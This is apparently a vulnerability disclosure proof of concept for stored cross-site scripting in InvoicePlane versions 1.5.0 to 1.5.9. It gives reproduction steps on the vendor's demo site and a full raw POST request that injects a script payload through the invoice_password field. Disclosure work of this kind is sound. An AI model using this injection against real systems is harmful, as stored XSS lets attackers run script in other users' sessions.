POC: A Stored Cross-site scripting (XSS) was discovered in InvoicePlane application versions from v1.5.0 to v1.5.9（https://github.com/InvoicePlane/InvoicePlane） After logging into the InvoicePlane application, browse to "view invoices" option available at https://demo.invoiceplane.com/index.php/invoices/status/all and select any ivoice for Demonstartion, https://demo.invoiceplane.com/index.php/invoices/view/27. In this invoice page inject a JavaScript payload in "PDF password" parameter input. Injected JS payload will be sent to server as POST parameter data in "invoice_password" POST field Below is the POST Request for the InvoicePlane Application to execute Stored XSS: (Invoice_password parameter is vulnerable to Stored XSS): POST /index.php/invoices/ajax/save HTTP/1.1 Host: demo.invoiceplane.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demo.invoiceplane.com/index.php/invoices/view/32 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 786 Cookie: ip_csrf_cookie=e6daab2293247ef975dc1e2bf621716e; ip_session=ki8khmtnpv7t3jkcj0q6dvsjm46oa6va Connection: close invoice_id=32& invoice_number=INV-19-0032& invoice_date_created=01%2F30%2F2019& invoice_date_due=03%2F01%2F2019& invoice_status_id=1& invoice_password=tester"><script>alert("StoredXSS")</script>& items=%5B%7B%22invoice_id%22%3A%2232%22%2C%22item_id%22%3A%22%22%2C%22item_product_id%22%3A%22%22%2C%22item_task_id%22%3A%22%22%2C%22item_name%22%3A%22%22%2C%22item_quantity%22%3A%22%22%2C%22item_price%22%3A%22%22%2C%22item_discount_amount%22%3A%22%22%2C%22item_tax_rate_id%22%3A%220%22%2C%22item_description%22%3A%22%22%2C%22item_product_unit_id%22%3A%220%22%2C%22item_order%22%3A1%7D%5D& invoice_discount_amount=& invoice_discount_percent=& invoice_terms=& custom%5B0%5D%5Bname%5D=custom%5B3%5D& custom%5B0%5D%5Bvalue%5D=& payment_method=0& _ip_csrf=e6daab2293247ef975dc1e2bf621716e